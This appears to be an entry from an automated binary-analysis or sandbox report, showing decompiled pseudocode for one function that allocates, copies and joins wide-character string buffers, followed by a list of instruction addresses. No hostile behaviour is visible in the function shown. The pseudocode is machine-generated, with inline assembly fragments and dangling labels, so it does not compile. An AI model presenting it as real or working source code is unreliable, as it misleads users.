Function 6E7A89F0, Relevance: 2.0, Strings: 1, Instructions: 748
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6E7A89F0(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				unsigned int _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _t205;
				signed int* _t207;
				signed int _t211;
				unsigned int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t223;
				intOrPtr* _t224;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t253;
				signed int _t258;
				signed int _t261;
				signed int _t262;
				unsigned int _t271;
				signed int _t277;
				void* _t278;
				signed int _t279;
				signed int _t280;
				short* _t283;
				signed int _t285;
				signed int _t286;
				intOrPtr* _t292;
				signed short* _t295;
				signed int* _t296;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				unsigned int _t309;
				signed int _t310;
				signed int _t313;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				void* _t322;
				signed int _t323;
				void* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				unsigned int _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t350;
				intOrPtr _t352;
				intOrPtr* _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				void* _t358;
				signed int _t359;
				signed int _t360;
				signed int* _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t374;
				unsigned int _t381;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t385;
				intOrPtr* _t386;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t401;
				unsigned int _t403;
				signed int _t404;
				signed short* _t405;
				signed int _t406;
				signed int _t407;
				signed int _t414;
				intOrPtr* _t419;
				signed int _t420;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				unsigned int _t431;
				signed int _t433;
				signed int _t439;
				signed int* _t441;
				signed int* _t442;
				signed int _t444;
				void* _t446;
				void* _t448;

				_push(_t298);
				_t446 = (_t444 & 0xfffffff0) - 0x24;
				_t419 = __ecx;
				_t352 =  *__ecx;
				if(_t352 != 0) {
					_t318 =  *( *( *(__ecx + 4)));
					__eflags = _t318;
					if(_t318 == 0) {
						L34:
						_push(0x80);
						_t299 = E6E791030();
						_t446 = _t446 + 4;
						__eflags =  *_t419 - 1;
						 *_t299 = 0;
						if( *_t419 <= 1) {
							goto L45;
						} else {
							_t374 = 0x40;
							goto L36;
						}
					} else {
						__eflags =  *_t318 & 0x0000ffff;
						if(( *_t318 & 0x0000ffff) == 0) {
							goto L34;
						} else {
							_t277 = _t318 & 0x0000000f;
							__eflags = _t277;
							if(_t277 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t414 =  ~( ~_t277 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t414;
								while(1) {
									asm("movdqu xmm1, [ecx+eax*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t298;
									if(_t298 != 0) {
										break;
									}
									_t277 = _t277 + 8;
									__eflags = _t277 - _t414;
									if(_t277 < _t414) {
										continue;
									} else {
										__eflags = _t414 - 0x7fffffff;
										if(_t414 >= 0x7fffffff) {
											goto L22;
										} else {
											goto L20;
										}
									}
									goto L23;
								}
								asm("bsf edi, ebx");
								_t414 = (_t414 >> 1) + _t277;
							} else {
								_t414 = 0;
								__eflags = _t277 & 0x00000001;
								if((_t277 & 0x00000001) != 0) {
									while(1) {
										L20:
										__eflags =  *(_t318 + _t414 * 2) & 0x0000ffff;
										if(( *(_t318 + _t414 * 2) & 0x0000ffff) == 0) {
											goto L23;
										}
										_t414 = _t414 + 1;
										__eflags = _t414 - 0x7fffffff;
										if(_t414 < 0x7fffffff) {
											continue;
										} else {
											L22:
											_t414 = 0x7fffffff;
										}
										goto L23;
									}
								} else {
									_t277 =  ~_t277 + 0x10 >> 1;
									__eflags = _t277;
									while(1) {
										_t298 =  *(_t318 + _t414 * 2) & 0x0000ffff;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L23;
										}
										_t414 = _t414 + 1;
										__eflags = _t414 - _t277;
										if(_t414 < _t277) {
											continue;
										} else {
											goto L16;
										}
										goto L23;
									}
								}
							}
							L23:
							_t23 = _t414 + 1; // 0x80000000
							_t278 = _t23;
							__eflags = _t278 - 0x40;
							_t279 =  <=  ? 0x40 : _t278;
							__eflags = _t279;
							if(_t279 > 0) {
								_t309 = (_t279 >> 5 >> 0x1a) + _t279 >> 6;
								_t280 = _t279 & 0x8000003f;
								__eflags = _t280;
								if(_t280 < 0) {
									_t280 = (_t280 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t280;
								}
								__eflags = _t280;
								_t310 = _t309 + (0 | _t280 > 0x00000000);
								_push(_t310 << 7);
								_v36 = _t310 << 6;
								_v52 = _t318;
								_t283 = E6E791030();
								_t350 = _v52;
								_t374 = _v36;
								_v48 = _t283;
								_t446 = _t446 + 4;
								_v40 = _t283;
								_v44 = 0;
								 *_t283 = 0;
								_v28 = _t419;
								_v52 =  *_t419;
								_t313 = _v44;
								_t441 = _v48;
								while(1) {
									_t285 =  *_t350 & 0x0000ffff;
									_t313 = _t313 + 1;
									 *_t441 = _t285;
									__eflags = _t414;
									if(_t414 == 0) {
										goto L32;
									}
									__eflags = _t313 - _t414;
									if(_t313 == _t414) {
										_v48 = _t441;
										__eflags = 0;
										_t299 = _v40;
										_t286 = _v52;
										_t419 = _v28;
										_t441[0] = 0;
									} else {
										goto L32;
									}
									L177:
									__eflags = _t286 - 1;
									if(_t286 > 1) {
										goto L36;
									} else {
										goto L178;
									}
									goto L89;
									L32:
									__eflags = _t285;
									if(_t285 == 0) {
										_t299 = _v40;
										_t286 = _v52;
										_t419 = _v28;
									} else {
										_t441 =  &(_t441[0]);
										_t350 = _t350 + 2;
										__eflags = _t350;
										continue;
									}
									goto L177;
								}
							} else {
								_t299 = 0;
								__eflags = _t352 - 1;
								if(_t352 <= 1) {
									L45:
									_t353 = _a4;
									 *_t353 = 0;
									 *((intOrPtr*)(_t353 + 4)) = 0;
									__eflags = _t299;
									if(_t299 == 0) {
										goto L80;
									} else {
										goto L46;
									}
								} else {
									_t374 = 0;
									L36:
									_t223 = _a8 & 0x0000ffff;
									_t403 = 1;
									_v36 = _t374;
									asm("pxor xmm0, xmm0");
									do {
										__eflags = _t223;
										if(_t223 == 0) {
											_v28 = _t419;
										} else {
											__eflags = _t299;
											if(_t299 == 0) {
												_v28 = _t419;
												L182:
												_t425 = 0;
											} else {
												_v28 = _t419;
												L151:
												_t248 = _t299 & 0x0000000f;
												__eflags = _t248;
												if(_t248 == 0) {
													L156:
													asm("pxor xmm1, xmm1");
													_t439 =  ~( ~_t248 + 0x00000007 & 0x00000007) + 0x7fffffff;
													__eflags = _t439;
													while(1) {
														asm("movdqu xmm0, [ebx+eax*2]");
														asm("pcmpeqw xmm0, xmm1");
														asm("pmovmskb edx, xmm0");
														__eflags = _t374;
														if(_t374 != 0) {
															break;
														}
														_t248 = _t248 + 8;
														__eflags = _t248 - _t439;
														if(_t248 < _t439) {
															continue;
														} else {
															__eflags = _t439 - 0x7fffffff;
															if(_t439 >= 0x7fffffff) {
																goto L162;
															} else {
																goto L160;
															}
														}
														goto L163;
													}
													asm("bsf esi, edx");
													_t425 = (_t439 >> 1) + _t248;
													goto L191;
												} else {
													_t439 = 0;
													__eflags = _t248 & 0x00000001;
													if((_t248 & 0x00000001) != 0) {
														while(1) {
															L160:
															__eflags =  *(_t299 + _t439 * 2) & 0x0000ffff;
															if(( *(_t299 + _t439 * 2) & 0x0000ffff) == 0) {
																goto L191;
															}
															_t439 = _t439 + 1;
															__eflags = _t439 - 0x7fffffff;
															if(_t439 < 0x7fffffff) {
																continue;
															} else {
																L162:
																_t425 = 0x7fffffff;
															}
															goto L163;
														}
														goto L191;
													} else {
														_t248 =  ~_t248 + 0x10 >> 1;
														__eflags = _t248;
														while(1) {
															_t374 =  *(_t299 + _t439 * 2) & 0x0000ffff;
															__eflags = _t374;
															if(_t374 == 0) {
																break;
															}
															_t439 = _t439 + 1;
															__eflags = _t439 - _t248;
															if(_t439 < _t248) {
																continue;
															} else {
																goto L156;
															}
															goto L163;
														}
														L191:
														__eflags = _t425 - 0xfffffffe;
														if(_t425 == 0xfffffffe) {
															 *_t299 = 0;
														}
													}
												}
											}
											L163:
											_t158 = _t425 + 2; // -2147483652
											_t324 = _t158;
											__eflags = _t324 - 0x40;
											_t325 =  <=  ? 0x40 : _t324;
											__eflags = _t325 - _v36;
											if(_t325 > _v36) {
												_t381 = (_t325 >> 5 >> 0x1a) + _t325 >> 6;
												_t326 = _t325 & 0x8000003f;
												__eflags = _t326;
												if(_t326 < 0) {
													_t326 = (_t326 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t326;
												}
												__eflags = _t326;
												_t382 = _t381 + (0 | _t326 > 0x00000000);
												_v36 = _t382 << 6;
												_push(_t382 << 7);
												_t384 = E6E791030();
												_t446 = _t446 + 4;
												__eflags = _t299;
												if(_t299 == 0) {
													__eflags = 0;
													 *_t384 = 0;
												} else {
													__eflags = _t384;
													if(_t384 != 0) {
														_t242 =  *_t299 & 0x0000ffff;
														 *_t384 = _t242;
														__eflags = _t242;
														if(_t242 != 0) {
															_t243 = 0;
															__eflags = 0;
															while(1) {
																_t243 = _t243 + 1;
																_t329 =  *(_t299 + _t243 * 4 - 2) & 0x0000ffff;
																 *(_t384 + _t243 * 4 - 2) = _t329;
																__eflags = _t329;
																if(_t329 == 0) {
																	goto L172;
																}
																_t330 =  *(_t299 + _t243 * 4) & 0x0000ffff;
																 *(_t384 + _t243 * 4) = _t330;
																__eflags = _t330;
																if(_t330 != 0) {
																	continue;
																}
																goto L172;
															}
														}
													}
													L172:
													_push(2);
													_push(_t299);
													_v48 = _t384;
													E6E7910B0();
													_t384 = _v48;
													_t446 = _t446 + 8;
												}
												_t299 = _t384;
											}
											 *((short*)(_t299 + _t425 * 2)) = _a8 & 0x0000ffff;
											 *((short*)(_t299 + 2 + _t425 * 2)) = 0;
											while(1) {
												L41:
												_t224 = _v28;
												_t323 =  *( *((intOrPtr*)(_t224 + 4)) + _t403 * 4);
												_t374 =  *_t323;
												__eflags = _t374;
												if(_t374 == 0) {
													break;
												}
												__eflags =  *_t374 & 0x0000ffff;
												if(( *_t374 & 0x0000ffff) != 0) {
													__eflags = _t374 - _t299;
													if(_t374 == _t299) {
														goto L43;
													} else {
														_t227 = _t374 & 0x0000000f;
														__eflags = _t227;
														if(_t227 == 0) {
															L96:
															asm("pxor xmm1, xmm1");
															_t431 =  ~( ~_t227 + 0x00000007 & 0x00000007) + 0x7fffffff;
															__eflags = _t431;
															while(1) {
																asm("movdqu xmm0, [edx+eax*2]");
																asm("pcmpeqw xmm0, xmm1");
																asm("pmovmskb ecx, xmm0");
																__eflags = _t323;
																if(_t323 != 0) {
																	break;
																}
																_t227 = _t227 + 8;
																__eflags = _t227 - _t431;
																if(_t227 < _t431) {
																	continue;
																} else {
																	__eflags = _t431 - 0x7fffffff;
																	if(_t431 >= 0x7fffffff) {
																		goto L102;
																	} else {
																		goto L100;
																	}
																}
																goto L103;
															}
															asm("bsf esi, ecx");
															_t433 = (_t431 >> 1) + _t227;
														} else {
															_t433 = 0;
															__eflags = _t227 & 0x00000001;
															if((_t227 & 0x00000001) != 0) {
																while(1) {
																	L100:
																	__eflags =  *(_t374 + _t433 * 2) & 0x0000ffff;
																	if(( *(_t374 + _t433 * 2) & 0x0000ffff) == 0) {
																		goto L103;
																	}
																	_t433 = _t433 + 1;
																	__eflags = _t433 - 0x7fffffff;
																	if(_t433 < 0x7fffffff) {
																		continue;
																	} else {
																		L102:
																		_t433 = 0x7fffffff;
																	}
																	goto L103;
																}
															} else {
																_t227 =  ~_t227 + 0x10 >> 1;
																__eflags = _t227;
																while(1) {
																	_t323 =  *(_t374 + _t433 * 2) & 0x0000ffff;
																	__eflags = _t323;
																	if(_t323 == 0) {
																		goto L103;
																	}
																	_t433 = _t433 + 1;
																	__eflags = _t433 - _t227;
																	if(_t433 < _t227) {
																		continue;
																	} else {
																		goto L96;
																	}
																	goto L103;
																}
															}
														}
														L103:
														__eflags = _t299;
														if(_t299 == 0) {
															_t228 = 0;
														} else {
															_t346 = _t299 & 0x0000000f;
															__eflags = _t346;
															if(_t346 == 0) {
																L110:
																asm("pxor xmm1, xmm1");
																_v24 = _t403;
																_t228 =  ~( ~_t346 + 0x00000007 & 0x00000007) + 0x7fffffff;
																__eflags = _t228;
																while(1) {
																	asm("movdqu xmm0, [ebx+ecx*2]");
																	asm("pcmpeqw xmm0, xmm1");
																	asm("pmovmskb edi, xmm0");
																	__eflags = _t403;
																	if(_t403 != 0) {
																		break;
																	}
																	_t346 = _t346 + 8;
																	__eflags = _t346 - _t228;
																	if(_t346 < _t228) {
																		continue;
																	} else {
																		_t403 = _v24;
																		__eflags = _t228 - 0x7fffffff;
																		if(_t228 >= 0x7fffffff) {
																			goto L116;
																		} else {
																			goto L114;
																		}
																	}
																	goto L117;
																}
																asm("bsf eax, eax");
																_t271 = _t403 >> 1;
																_t403 = _v24;
																_t228 = _t271 + _t346;
															} else {
																_t228 = 0;
																__eflags = _t346 & 0x00000001;
																if((_t346 & 0x00000001) != 0) {
																	while(1) {
																		L114:
																		__eflags =  *(_t299 + _t228 * 2) & 0x0000ffff;
																		if(( *(_t299 + _t228 * 2) & 0x0000ffff) == 0) {
																			goto L117;
																		}
																		_t228 = _t228 + 1;
																		__eflags = _t228 - 0x7fffffff;
																		if(_t228 < 0x7fffffff) {
																			continue;
																		} else {
																			L116:
																			_t228 = 0x7fffffff;
																		}
																		goto L117;
																	}
																} else {
																	_t346 =  ~_t346 + 0x10 >> 1;
																	__eflags = _t346;
																	_v24 = _t403;
																	while(1) {
																		__eflags =  *(_t299 + _t228 * 2) & 0x0000ffff;
																		if(( *(_t299 + _t228 * 2) & 0x0000ffff) == 0) {
																			break;
																		}
																		_t228 = _t228 + 1;
																		__eflags = _t228 - _t346;
																		if(_t228 < _t346) {
																			continue;
																		} else {
																			_t403 = _v24;
																			goto L110;
																		}
																		goto L117;
																	}
																	_t403 = _v24;
																}
															}
														}
														L117:
														_t105 = _t228 + 1; // 0x80000000
														_t229 = _t433 + _t105;
														__eflags = _t229;
														if(_t229 != 0) {
															__eflags = _t229 - 0x40;
															_t230 =  <=  ? 0x40 : _t229;
															__eflags = _t230 - _v36;
															if(_t230 > _v36) {
																goto L123;
															}
															goto L135;
														} else {
															__eflags = _t299;
															if(_t299 == 0) {
																__eflags = _v36 - 0x40;
																if(_v36 < 0x40) {
																	goto L121;
																} else {
																	goto L187;
																}
															} else {
																_t334 = 0;
																 *_t299 = 0;
																__eflags = _v36 - 0x40;
																if(_v36 < 0x40) {
																	L121:
																	_t230 = 0x40;
																	L123:
																	_t341 = (_t230 >> 5 >> 0x1a) + _t230 >> 6;
																	_t253 = _t230 & 0x8000003f;
																	__eflags = _t253;
																	if(_t253 < 0) {
																		_t253 = (_t253 - 0x00000001 | 0xffffffc0) + 1;
																		__eflags = _t253;
																	}
																	__eflags = _t253;
																	_t342 = _t341 + (0 | _t253 > 0x00000000);
																	_v36 = _t342 << 6;
																	_push(_t342 << 7);
																	_v32 = _t374;
																	_t258 = E6E791030();
																	_t374 = _v32;
																	_t344 = _t258;
																	_t446 = _t446 + 4;
																	__eflags = _t299;
																	if(_t299 == 0) {
																		__eflags = 0;
																		 *_t344 = 0;
																	} else {
																		__eflags = _t344;
																		if(_t344 != 0) {
																			_t261 =  *_t299 & 0x0000ffff;
																			 *_t344 = _t261;
																			__eflags = _t261;
																			if(_t261 != 0) {
																				_v24 = _t403;
																				_t262 = 0;
																				__eflags = 0;
																				while(1) {
																					_t262 = _t262 + 1;
																					_t406 =  *(_t299 + _t262 * 4 - 2) & 0x0000ffff;
																					 *(_t344 + _t262 * 4 - 2) = _t406;
																					__eflags = _t406;
																					if(_t406 == 0) {
																						break;
																					}
																					_t407 =  *(_t299 + _t262 * 4) & 0x0000ffff;
																					 *(_t344 + _t262 * 4) = _t407;
																					__eflags = _t407;
																					if(_t407 != 0) {
																						continue;
																					}
																					break;
																				}
																				_t403 = _v24;
																			}
																		}
																		_push(2);
																		_push(_t299);
																		_v52 = _t344;
																		_v32 = _t374;
																		E6E7910B0();
																		_t374 = _v32;
																		_t344 = _v52;
																		_t446 = _t446 + 8;
																	}
																	_t299 = _t344;
																	L135:
																	_t231 = _t299;
																	__eflags = _t299;
																	if(_t299 == 0) {
																		L187:
																		_t403 = _t403 + 1;
																		__eflags = _t403 -  *_v28;
																		if(_t403 >=  *_v28) {
																			_t385 = _a4;
																			 *_t385 = 0;
																			 *((intOrPtr*)(_t385 + 4)) = 0;
																			goto L80;
																		} else {
																			__eflags = _a8 & 0x0000ffff;
																			if((_a8 & 0x0000ffff) != 0) {
																				goto L182;
																			} else {
																				continue;
																			}
																			goto L198;
																		}
																	} else {
																		_t334 =  *_t299 & 0x0000ffff;
																		goto L137;
																	}
																} else {
																	_t231 = _t299;
																	L137:
																	__eflags = _t334;
																	if(_t334 != 0) {
																		_v32 = _t374;
																		_t336 = 0;
																		__eflags = 0;
																		_v24 = _t403;
																		while(1) {
																			_t336 = _t336 + 1;
																			_t405 = _t299 + _t336 * 4;
																			_t231 = _t405 - 2;
																			__eflags =  *(_t405 - 2) & 0x0000ffff;
																			if(( *(_t405 - 2) & 0x0000ffff) == 0) {
																				break;
																			}
																			_t231 = _t405;
																			__eflags =  *_t405 & 0x0000ffff;
																			if(( *_t405 & 0x0000ffff) != 0) {
																				continue;
																			}
																			break;
																		}
																		_t374 = _v32;
																		_t403 = _v24;
																	}
																	_t335 = _t231;
																	__eflags = _t433;
																	if(__eflags != 0) {
																		if(__eflags > 0) {
																			goto L145;
																		}
																	} else {
																		_t433 = 0x7fffffff;
																		L145:
																		_v44 = 0;
																		_v24 = _t403;
																		_v40 = _t299;
																		_t404 = _v44;
																		while(1) {
																			_t303 =  *(_t374 + _t404 * 2) & 0x0000ffff;
																			 *(_t335 + _t404 * 2) = _t303;
																			__eflags = _t303;
																			if(_t303 == 0) {
																				break;
																			}
																			_t146 = _t404 * 2; // 0x2
																			_t231 = _t335 + _t146 + 2;
																			_t404 = _t404 + 1;
																			__eflags = _t404 - _t433;
																			if(_t404 < _t433) {
																				continue;
																			}
																			break;
																		}
																		_t403 = _v24;
																		_t299 = _v40;
																	}
																	_t374 = 0;
																	_t403 = _t403 + 1;
																	 *_t231 = 0;
																	__eflags = _t403 -  *_v28;
																	if(_t403 >=  *_v28) {
																		L178:
																		_t386 = _a4;
																		 *_t386 = 0;
																		 *((intOrPtr*)(_t386 + 4)) = 0;
																		L46:
																		_t211 =  *_t299 & 0x0000ffff;
																		__eflags = _t211;
																		if(_t211 == 0) {
																			L80:
																			_push(0x80);
																			_t420 = E6E791030();
																			_t446 = _t446 + 4;
																			_t205 =  *_a4;
																			__eflags = _t205;
																			if(_t205 == 0) {
																				__eflags = 0;
																				 *_t420 = 0;
																			} else {
																				__eflags = _t420;
																				if(_t420 != 0) {
																					_t354 =  *_t205 & 0x0000ffff;
																					 *_t420 = _t354;
																					__eflags = _t354;
																					if(_t354 != 0) {
																						_t355 = 0;
																						__eflags = 0;
																						while(1) {
																							_t355 = _t355 + 1;
																							_t319 =  *(_t205 + _t355 * 4 - 2) & 0x0000ffff;
																							 *(_t420 + _t355 * 4 - 2) = _t319;
																							__eflags = _t319;
																							if(_t319 == 0) {
																								goto L86;
																							}
																							_t320 =  *(_t205 + _t355 * 4) & 0x0000ffff;
																							 *(_t420 + _t355 * 4) = _t320;
																							__eflags = _t320;
																							if(_t320 != 0) {
																								continue;
																							}
																							goto L86;
																						}
																					}
																				}
																				L86:
																				_push(2);
																				_push(_t205);
																				E6E7910B0();
																				_t446 = _t446 + 8;
																			}
																			_t207 = _a4;
																			 *_t207 = _t420;
																			_t207[1] = 0x40;
																		} else {
																			_t357 = _t299 & 0x0000000f;
																			__eflags = _t357;
																			if(_t357 == 0) {
																				L52:
																				asm("pxor xmm0, xmm0");
																				_t401 =  ~( ~_t357 + 0x00000007 & 0x00000007) + 0x7fffffff;
																				__eflags = _t401;
																				while(1) {
																					asm("movdqu xmm1, [ebx+edx*2]");
																					asm("pcmpeqw xmm1, xmm0");
																					asm("pmovmskb eax, xmm1");
																					__eflags = _t211;
																					if(_t211 != 0) {
																						break;
																					}
																					_t357 = _t357 + 8;
																					__eflags = _t357 - _t401;
																					if(_t357 < _t401) {
																						continue;
																					} else {
																						__eflags = _t401 - 0x7fffffff;
																						if(_t401 >= 0x7fffffff) {
																							goto L58;
																						} else {
																							goto L56;
																						}
																					}
																					goto L59;
																				}
																				asm("bsf edi, eax");
																				_t401 = (_t401 >> 1) + _t357;
																			} else {
																				_t401 = 0;
																				__eflags = _t357 & 0x00000001;
																				if((_t357 & 0x00000001) != 0) {
																					while(1) {
																						L56:
																						__eflags =  *(_t299 + _t401 * 2) & 0x0000ffff;
																						if(( *(_t299 + _t401 * 2) & 0x0000ffff) == 0) {
																							goto L59;
																						}
																						_t401 = _t401 + 1;
																						__eflags = _t401 - 0x7fffffff;
																						if(_t401 < 0x7fffffff) {
																							continue;
																						} else {
																							L58:
																							_t401 = 0x7fffffff;
																						}
																						goto L59;
																					}
																				} else {
																					_t357 =  ~_t357 + 0x10 >> 1;
																					__eflags = _t357;
																					while(1) {
																						_t211 =  *(_t299 + _t401 * 2) & 0x0000ffff;
																						__eflags = _t211;
																						if(_t211 == 0) {
																							goto L59;
																						}
																						_t401 = _t401 + 1;
																						__eflags = _t401 - _t357;
																						if(_t401 < _t357) {
																							continue;
																						} else {
																							goto L52;
																						}
																						goto L59;
																					}
																				}
																			}
																			L59:
																			_t54 = _t401 + 1; // 0x80000000
																			_t358 = _t54;
																			__eflags = _t358 - 0x40;
																			_t359 =  <=  ? 0x40 : _t358;
																			__eflags = _t359;
																			if(_t359 > 0) {
																				_t217 = (_t359 >> 5 >> 0x1a) + _t359 >> 6;
																				_t360 = _t359 & 0x8000003f;
																				__eflags = _t360;
																				if(_t360 < 0) {
																					_t360 = (_t360 - 0x00000001 | 0xffffffc0) + 1;
																					__eflags = _t360;
																				}
																				__eflags = _t360;
																				_t218 = _t217 + (0 | _t360 > 0x00000000);
																				_push(_t218 << 7);
																				_t423 = _t218 << 6;
																				_t220 = E6E791030();
																				_t446 = _t446 + 4;
																				_t321 =  *_a4;
																				__eflags = _t321;
																				if(_t321 == 0) {
																					__eflags = 0;
																					 *_t220 = 0;
																				} else {
																					__eflags = _t220;
																					if(_t220 != 0) {
																						_t368 =  *_t321 & 0x0000ffff;
																						 *_t220 = _t368;
																						__eflags = _t368;
																						if(_t368 != 0) {
																							_v40 = _t299;
																							_t369 = 0;
																							__eflags = 0;
																							while(1) {
																								_t369 = _t369 + 1;
																								_t301 =  *(_t321 + _t369 * 4 - 2) & 0x0000ffff;
																								 *(_t220 + _t369 * 4 - 2) = _t301;
																								__eflags = _t301;
																								if(_t301 == 0) {
																									break;
																								}
																								_t302 =  *(_t321 + _t369 * 4) & 0x0000ffff;
																								 *(_t220 + _t369 * 4) = _t302;
																								__eflags = _t302;
																								if(_t302 != 0) {
																									continue;
																								}
																								break;
																							}
																							_t299 = _v40;
																						}
																					}
																					_push(2);
																					_push(_t321);
																					_v52 = _t220;
																					E6E7910B0();
																					_t220 = _v52;
																					_t446 = _t446 + 8;
																				}
																				_t365 = _a4;
																				_t365[1] = _t423;
																				 *_t365 = _t220;
																			} else {
																				_t220 = 0;
																			}
																			_t366 = _t299;
																			__eflags = _t220;
																			if(_t220 != 0) {
																				_t322 = 0;
																				while(1) {
																					_t424 =  *_t366 & 0x0000ffff;
																					_t322 = _t322 + 1;
																					 *_t220 = _t424;
																					__eflags = _t401;
																					if(_t401 == 0) {
																						goto L78;
																					}
																					__eflags = _t322 - _t401;
																					if(_t322 == _t401) {
																						 *(_t220 + 2) = 0;
																					} else {
																						goto L78;
																					}
																					goto L89;
																					L78:
																					__eflags = _t424;
																					if(_t424 != 0) {
																						_t220 = _t220 + 2;
																						_t366 = _t366 + 2;
																						__eflags = _t366;
																						continue;
																					}
																					goto L89;
																				}
																			}
																		}
																	} else {
																		__eflags = _a8 & 0x0000ffff;
																		if((_a8 & 0x0000ffff) == 0) {
																			continue;
																		} else {
																			goto L151;
																		}
																		goto L198;
																	}
																}
															}
														}
													}
												} else {
													L43:
													_t223 = _a8 & 0x0000ffff;
													_t419 = _v28;
													goto L44;
												}
												goto L89;
											}
											_t419 = _t224;
											_t223 = _a8 & 0x0000ffff;
											goto L44;
										}
										goto L41;
										L44:
										_t403 = _t403 + 1;
										__eflags = _t403 -  *_t419;
									} while (_t403 <  *_t419);
									goto L45;
								}
							}
						}
					}
					L89:
					_push(2);
					_push(_t299);
					E6E7910B0();
					return _a4;
				} else {
					_t292 = _a4;
					_t314 = 0;
					_push(0x80);
					 *_t292 = 0;
					 *((intOrPtr*)(_t292 + 4)) = 0;
					_t442 = E6E791030();
					_t448 = _t446 + 4;
					_t295 =  *_a4;
					if(_t295 == 0) {
						 *_t442 = 0;
					} else {
						if(_t442 != 0) {
							_t391 =  *_t295 & 0x0000ffff;
							 *_t442 = _t391;
							if(_t391 != 0) {
								while(1) {
									_t314 = _t314 + 1;
									_t392 =  *(_t295 + _t314 * 4 - 2) & 0x0000ffff;
									 *(_t442 + _t314 * 4 - 2) = _t392;
									if(_t392 == 0) {
										goto L6;
									}
									_t393 =  *(_t295 + _t314 * 4) & 0x0000ffff;
									_t442[_t314] = _t393;
									if(_t393 != 0) {
										continue;
									}
									goto L6;
								}
							}
						}
						L6:
						_push(2);
						_push(_t295);
						E6E7910B0();
						_t448 = _t448 + 8;
					}
					_t296 = _a4;
					_t296[1] = 0x40;
					 *_t296 = _t442;
					return _t296;
				}
				L198:
			}

0x6e7a89f8
0x6e7a89f9
0x6e7a89fc
0x6e7a89fe
0x6e7a8a02
0x6e7a8a7c
0x6e7a8a7e
0x6e7a8a80
0x6e7a8bb5
0x6e7a8bb5
0x6e7a8bbf
0x6e7a8bc1
0x6e7a8bc6
0x6e7a8bc9
0x6e7a8bcc
0x00000000
0x6e7a8bce
0x6e7a8bce
0x00000000
0x6e7a8bce
0x6e7a8a86
0x6e7a8a89
0x6e7a8a8b
0x00000000
0x6e7a8a91
0x6e7a8a93
0x6e7a8a93
0x6e7a8a96
0x6e7a8ab2
0x6e7a8ab6
0x6e7a8ac2
0x6e7a8ac2
0x6e7a8ac8
0x6e7a8ac8
0x6e7a8acd
0x6e7a8ad1
0x6e7a8ad5
0x6e7a8ad7
0x00000000
0x00000000
0x6e7a8add
0x6e7a8ae0
0x6e7a8ae2
0x00000000
0x6e7a8ae4
0x6e7a8ae4
0x6e7a8aea
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8aea
0x00000000
0x6e7a8ae2
0x6e7a91f2
0x6e7a91f7
0x6e7a8a98
0x6e7a8a98
0x6e7a8a9a
0x6e7a8a9c
0x6e7a8aec
0x6e7a8aec
0x6e7a8af0
0x6e7a8af2
0x00000000
0x00000000
0x6e7a8af4
0x6e7a8af5
0x6e7a8afb
0x00000000
0x6e7a8afd
0x6e7a8afd
0x6e7a8afd
0x6e7a8afd
0x00000000
0x6e7a8afb
0x6e7a8a9e
0x6e7a8aa3
0x6e7a8aa3
0x6e7a8aa5
0x6e7a8aa5
0x6e7a8aa9
0x6e7a8aab
0x00000000
0x00000000
0x6e7a8aad
0x6e7a8aae
0x6e7a8ab0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8ab0
0x6e7a8aa5
0x6e7a8a9c
0x6e7a8b02
0x6e7a8b07
0x6e7a8b07
0x6e7a8b0a
0x6e7a8b0d
0x6e7a8b10
0x6e7a8b12
0x6e7a8b30
0x6e7a8b33
0x6e7a8b33
0x6e7a8b38
0x6e7a8b40
0x6e7a8b40
0x6e7a8b40
0x6e7a8b41
0x6e7a8b4b
0x6e7a8b55
0x6e7a8b56
0x6e7a8b5a
0x6e7a8b5e
0x6e7a8b63
0x6e7a8b67
0x6e7a8b6b
0x6e7a8b6f
0x6e7a8b74
0x6e7a8b78
0x6e7a8b7c
0x6e7a8b81
0x6e7a8b85
0x6e7a8b88
0x6e7a8b8c
0x6e7a8b98
0x6e7a8b98
0x6e7a8b9b
0x6e7a8b9c
0x6e7a8b9f
0x6e7a8ba1
0x00000000
0x00000000
0x6e7a8ba3
0x6e7a8ba5
0x6e7a91b6
0x6e7a91ba
0x6e7a91be
0x6e7a91c2
0x6e7a91c5
0x6e7a91c9
0x00000000
0x00000000
0x00000000
0x6e7a91cd
0x6e7a91cd
0x6e7a91d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8bab
0x6e7a8bab
0x6e7a8bad
0x6e7a91e5
0x6e7a91e9
0x6e7a91ec
0x6e7a8bb3
0x6e7a8b92
0x6e7a8b95
0x6e7a8b95
0x00000000
0x6e7a8b95
0x00000000
0x6e7a8bad
0x6e7a8b14
0x6e7a8b14
0x6e7a8b16
0x6e7a8b19
0x6e7a8c29
0x6e7a8c29
0x6e7a8c2e
0x6e7a8c30
0x6e7a8c33
0x6e7a8c35
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a8b1f
0x6e7a8b1f
0x6e7a8bd3
0x6e7a8bd3
0x6e7a8bd7
0x6e7a8bdc
0x6e7a8be0
0x6e7a8be4
0x6e7a8be4
0x6e7a8be6
